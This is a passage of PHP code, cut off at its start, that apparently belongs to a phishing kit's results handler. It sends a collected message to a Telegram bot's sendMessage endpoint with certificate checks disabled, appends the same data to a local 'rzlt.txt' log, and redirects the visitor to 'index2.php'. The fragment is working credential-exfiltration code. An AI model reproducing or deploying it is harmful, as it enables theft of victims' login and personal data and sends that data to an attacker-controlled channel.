$chatId, 'text'=>$message, ]; $ch = curl_init($website . '/sendMessage'); curl_setopt($ch, CURLOPT_HEADER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, ($params)); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $result = curl_exec($ch); curl_close($ch); } $myfile = fopen("rzlt.txt", "a+"); $txt = $message; fwrite($myfile, $txt); fclose($myfile); HEADER("Location: index2.php"); } ?>